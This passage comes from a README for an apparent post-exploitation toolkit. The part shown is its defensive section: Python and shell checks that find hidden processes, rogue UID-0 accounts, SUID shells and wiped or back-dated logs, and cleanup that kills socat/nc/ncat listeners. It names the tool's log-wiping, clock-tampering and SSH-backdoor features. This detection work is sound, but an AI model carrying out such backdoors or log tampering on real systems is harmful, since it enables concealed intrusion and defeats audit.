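    preloaded readdir hook) filters what ps/top/htop see; a listing of /proc by
    an unhooked process still has the entry. A process that starts or exits
    between the two snapshots also lands here, so re-run to confirm a hit."""
    return sorted(set(proc_pids) - set(ps_pids))


def listening_ports(proc_net_tcp_text):
    """(port, inode) for every LISTEN socket (state 0A) in /proc/net/tcp; the
    kernel table ignores ps-level hiding and the inode locates the owner in /proc/*/fd."""
    found = []
    for line in proc_net_tcp_text.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 10 or cols[3] != "0A":
            continue
        port = int(cols[1].rsplit(":", 1)[1], 16)  # local_address is HEXIP:HEXPORT
        found.append((port, int(cols[9])))
    return sorted(found)


def suspicious_suid(entries):
    """Paths from (path, st_mode) pairs that are setuid/setgid outside the
    packaged binary directories, e.g. /tmp/.shell from suidshell create."""
    return [p for p, mode in entries
            if mode & (stat.S_ISUID | stat.S_ISGID) and not p.startswith(PACKAGED_BIN)]


def suspicious_accounts(passwd_text):
    """Usernames with UID 0 other than root, or homed in a staging directory."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) < 7:
            continue
        name, uid, home = f[0], f[2], f[5]
        if (uid == "0" and name != "root") or home.startswith(STAGING_DIRS):
            hits.append(name)
    return hits


def collect_live():
    """Gather the real inputs (Linux only)."""
    ps = subprocess.run(["ps", "-eo", "pid="], capture_output=True, text=True).stdout
    ps_pids = [int(p) for p in ps.split()]
    proc_pids = [int(p) for p in os.listdir("/proc") if p.isdigit()]
    with open("/proc/net/tcp") as fh:
        tcp = fh.read()
    with open("/etc/passwd") as fh:
        passwd = fh.read()
    suid = []
    for d in STAGING_DIRS:
        for root, _dirs, files in os.walk(d):
            for name in files:
                path = os.path.join(root, name)
                try:
                    suid.append((path, os.lstat(path).st_mode))
                except OSError:
                    pass
    return proc_pids, ps_pids, tcp, passwd, suid


def main():
    proc_pids, ps_pids, tcp, passwd, suid = collect_live()
    print("hidden pids:", hidden_pids(proc_pids, ps_pids))
    print("listeners (port, inode):", listening_ports(tcp))
    print("suid/sgid in staging dirs:", suspicious_suid(suid))
    print("suspicious accounts:", suspicious_accounts(passwd))


if __name__ == "__main__":
    main()
```

Run it as root from a shell that does not have the suspect preload active (a fresh SSH session is usually enough); a hidden-PID hit should be followed by `ls -l /proc/<pid>/exe` and a look at `/etc/ld.so.preload`, and a listener whose inode does not appear under any `/proc/*/fd` is the same symptom seen from the socket side.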

4. Log Analysis

# Authentication anomalies (Debian/Ubuntu write to auth.log, RHEL/CentOS to /var/log/secure)
grep -hE "(Failed password|Invalid user)" /var/log/auth.log /var/log/secure 2>/dev/null | tail -20

# Clock changes (notime sets the system time): systemd logs "Time has been changed"; if the usual audit
# rule for settimeofday/clock_settime/adjtimex is loaded with key "time-change", ausearch names the caller
journalctl --since "1 day ago" | grep -iE "time has been changed|clock"
ausearch -k time-change 2>/dev/null

# Journal file integrity; a truncated or rewritten journal fails verification
journalctl --verify

# Access to account files; run ausearch once per file (reports only if a watch rule exists)
ausearch -f /etc/passwd 2>/dev/null
ausearch -f /etc/shadow 2>/dev/null
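The grep-based checks above assume the text log is intact, and xlog and notime target exactly that. As an added example for this guide (not CACM code), the script below implements two checks that do not rely on the local file alone: timestamp regressions, which expose lines written while the clock was set back or a file rewritten out of order, and a multiset diff against a forwarded copy from a syslog server, which lists the lines removed locally. The sample log lines, the host name and the five-minute tolerance are constructed for illustration; the classic syslog line format without a year is assumed, so the year is passed in.

```python
"""Log-integrity checks for two things this page's cleanup commands do to text
logs: xlog removes lines matching a pattern, and notime runs commands with the
system clock set back, so anything logged in that window carries an old
timestamp. Added example for this guide, not part of CACM. Handles the classic
'Mon DD HH:MM:SS host ...' line format; December/January rollover is not handled."""
import re
from collections import Counter
from datetime import datetime, timedelta

SYSLOG_TS = re.compile(r"^([A-Z][a-z]{2}) +(\d{1,2}) (\d{2}:\d{2}:\d{2}) ")

# Constructed forwarded copy of auth.log (what a remote syslog server received).
# The fifth line was written while the clock was set back to Jan 10 (notime).
REMOTE_LOG = [
    "Jan 15 14:29:50 web01 sshd[2201]: Accepted publickey for alice from 10.0.0.5 port 50122 ssh2",
    "Jan 15 14:30:05 web01 sshd[2210]: Failed password for invalid user admin from 192.168.1.100 port 41822 ssh2",
    "Jan 15 14:30:07 web01 sshd[2210]: Failed password for invalid user admin from 192.168.1.100 port 41822 ssh2",
    "Jan 15 14:30:40 web01 sshd[2230]: Accepted password for alice from 192.168.1.100 port 41900 ssh2",
    "Jan 10 08:30:15 web01 sudo:    alice : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/systemctl",
    "Jan 15 14:32:01 web01 CRON[2300]: pam_unix(cron:session): session opened for user root by (uid=0)",
]
# Constructed local copy after `xlog /var/log/auth.log "192.168.1.100"`
LOCAL_LOG = [line for line in REMOTE_LOG if "192.168.1.100" not in line]


def parse_ts(line, year):
    """Timestamp of a classic syslog line, or None if the line has none."""
    m = SYSLOG_TS.match(line)
    if not m:
        return None
    return datetime.strptime(f"{m.group(1)} {m.group(2)} {m.group(3)} {year}",
                             "%b %d %H:%M:%S %Y")


def timestamp_regressions(lines, year, tolerance=timedelta(minutes=5)):
    """Indices of lines stamped earlier than the highest timestamp seen so far
    by more than `tolerance`. Daemons flush slightly out of order, hence the
    slack; a jump of days means a clock change or a rewritten file."""
    hits, high = [], None
    for i, line in enumerate(lines):
        ts = parse_ts(line, year)
        if ts is None:
            continue
        if high is not None and ts < high - tolerance:
            hits.append(i)
        high = ts if high is None else max(high, ts)
    return hits


def missing_locally(local_lines, remote_lines):
    """Lines the forwarded copy has that the local file lacks, in remote order.
    Counter arithmetic keeps repeated lines (two identical failures) distinct."""
    deficit = Counter(remote_lines) - Counter(local_lines)
    out = []
    for line in remote_lines:
        if deficit[line] > 0:
            out.append(line)
            deficit[line] -= 1
    return out


def check_files(local_path, remote_path, year):
    """Run both checks on real files, e.g. /var/log/auth.log and the copy from the log server."""
    with open(local_path) as fh:
        local = fh.read().splitlines()
    with open(remote_path) as fh:
        remote = fh.read().splitlines()
    return {"regressions": timestamp_regressions(local, year),
            "removed": missing_locally(local, remote)}


if __name__ == "__main__":
    print("regressions in local copy:", timestamp_regressions(LOCAL_LOG, 2024))
    for line in missing_locally(LOCAL_LOG, REMOTE_LOG):
        print("removed locally:", line)
```

The diff only works if a copy left the host before the cleanup (remote syslog, a journald export, or a backup); without one, a regression is the only host-local signal, and a clean result proves nothing.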

Cleanup and Recovery

# Capture volatile evidence before killing anything: the binary, command line and open sockets vanish with the process
for p in $(pgrep -x "socat|nc|ncat"); do
  echo "== $p"; ls -l /proc/$p/exe; tr '\0' ' ' </proc/$p/cmdline; echo; ls -l /proc/$p/fd
done

# Terminate by exact process name; pkill patterns are extended regexes, in which "\|" is a literal bar,
# and an unanchored "nc" would also kill rsync, sync and anything else containing those letters
pkill -x -e "socat|nc|ncat"

# Accounts, SUID shells and SSH settings the tool changes (ssh_backdoor, suidshell): review, then remove with userdel/rm
awk -F: '$3 == 0 && $1 != "root"' /etc/passwd
find / -xdev -type f -perm -4000 -not -path "/usr/*" -not -path "/bin/*" -not -path "/sbin/*" 2>/dev/null
sshd -T | grep -iE "permitrootlogin|passwordauthentication|authorizedkeysfile"

# Archive staging directories for analysis before deleting them
tar czf /root/ir-$(date +%s).tgz /tmp/.*cacm* /dev/shm/.*workspace* 2>/dev/null && rm -rf /tmp/.*cacm* /dev/shm/.*workspace*

# Restore system time (notime changes it); ntpdate is deprecated, step the running time daemon instead
chronyc makestep 2>/dev/null || timedatectl set-ntp true

# Restore the distribution's defaults rather than a blanket 600
chmod 644 /etc/passwd /etc/group && chown root:root /etc/passwd /etc/group
chmod 640 /etc/shadow && chown root:shadow /etc/shadow   # Debian/Ubuntu; RHEL/CentOS ship it as 000 root:root

🤝 Contributing

Reporting Issues

  1. Create an Issue on GitHub
  2. Describe the problem and reproduction steps in detail
  3. Provide system environment information
  4. Attach relevant logs or screenshots

Feature Suggestions

  1. Check if similar suggestions already exist
  2. Describe feature requirements in detail
  3. Explain use cases and value
  4. Consider security and compliance implications

Code Contributions

  1. Fork the project repository
  2. Create a feature branch
  3. Write code and tests
  4. Submit a Pull Request
  5. Wait for code review

📄 License

This project is licensed under the MIT License. See the LICENSE file for details.

🔒 Disclaimer

Important Notice:

  1. Legal Use: This tool is for security research and authorized penetration testing only
  2. User Responsibility: Users are fully responsible for their actions and legal consequences
  3. Developer Disclaimer: Developers assume no legal responsibility for misuse or abuse of this tool
  4. Authorization Required: Must obtain clear written authorization from target system owners before use
  5. Educational Purpose: This tool is primarily for security education and defense capability improvement

By using this tool, you acknowledge that you have read, understood, and agree to comply with the above terms.


Last updated on: July 28, 2025 Version: v1.0 Author: RuoJi6
